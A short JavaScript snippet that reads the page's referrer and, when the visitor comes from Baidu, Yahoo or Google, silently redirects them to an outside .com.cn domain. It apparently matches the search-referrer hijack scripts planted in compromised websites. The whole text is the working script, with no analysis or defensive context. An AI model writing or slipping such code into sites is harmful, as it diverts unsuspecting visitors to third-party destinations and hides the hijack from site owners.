var s=document.referrer 
if(s.indexOf("baidu")>0) 
self.location="http://www.11no.com.cn/"; 
 
var s=document.referrer 
if(s.indexOf("yahoo")>0) 
self.location="http://www.11no.com.cn/"; 
 
var s=document.referrer 
if(s.indexOf("google")>0) 
self.location="http://www.11no.com.cn/"; 